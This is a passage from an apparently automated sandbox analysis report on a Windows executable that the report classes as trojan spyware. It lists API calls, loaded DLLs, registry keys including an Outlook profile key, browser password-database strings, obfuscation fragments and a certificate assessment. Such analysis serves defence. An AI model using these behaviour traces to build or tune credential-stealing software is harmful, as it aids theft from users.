            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36EC004010_2_36EC0040
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36EC0E4810_2_36EC0E48
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36EC075010_2_36EC0750
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36EC002110_2_36EC0021
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36EC0E4110_2_36EC0E41
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: String function: 00402AD0 appears 51 times
            Source: NDCNDvC27F.exeStatic PE information: invalid certificate
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080228173.0000000033DD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NDCNDvC27F.exe
            Source: NDCNDvC27F.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@5/5
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierministerJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeMutant created: NULL
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile created: C:\Users\user\AppData\Local\Temp\nsu9748.tmpJump to behavior
            Source: NDCNDvC27F.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.00000000340EF000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.000000003410D000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.00000000340FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NDCNDvC27F.exeVirustotal: Detection: 66%
            Source: NDCNDvC27F.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile read: C:\Users\user\Desktop\NDCNDvC27F.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\NDCNDvC27F.exe "C:\Users\user\Desktop\NDCNDvC27F.exe"
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess created: C:\Users\user\Desktop\NDCNDvC27F.exe "C:\Users\user\Desktop\NDCNDvC27F.exe"
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess created: C:\Users\user\Desktop\NDCNDvC27F.exe "C:\Users\user\Desktop\NDCNDvC27F.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: stempelpudernes.lnk.0.drLNK file: ..\Pictures\muringerne\giggliest.pha
            Source: dinosaurusserne.lnk.0.drLNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2042730966.000000000482F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_10002D50 push eax; ret 0_2_10002D7E
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360A273 pushad ; ret 10_2_0360A27A
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360A2E0 pushad ; ret 10_2_0360A2E2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03608AC1 push ecx; ret 10_2_03608AC2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03608AC3 push eax; ret 10_2_03608ACA
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_036098E3 push edi; ret 10_2_036098EA
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03608E79 push esi; ret 10_2_03608E7A
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03608E7B push esi; ret 10_2_03608E82
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03608D69 push edx; ret 10_2_03608D6A
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03608CE9 push edx; ret 10_2_03608CEA
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36203AD4 push ebx; retf 10_2_36203ADA

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Email domain 'Talrigeste.tj' is from Tajikistan (.tj), a high-risk country. 3) Organization 'Gungrede' is not a known legitimate company. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible certificate manipulation. 5) The organizational unit 'Mediateker Ideliste Nonlevel' appears nonsensical and suspicious. 6) While the country is listed as FR (France), the unusual naming patterns and Tajikistan email don't align with a legitimate French business. 7) The certificate validation explicitly failed with an untrusted root certificate error. These factors strongly suggest this is a malicious or compromised executable.
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile created: C:\Users\user\AppData\Local\Temp\nsi9FC6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
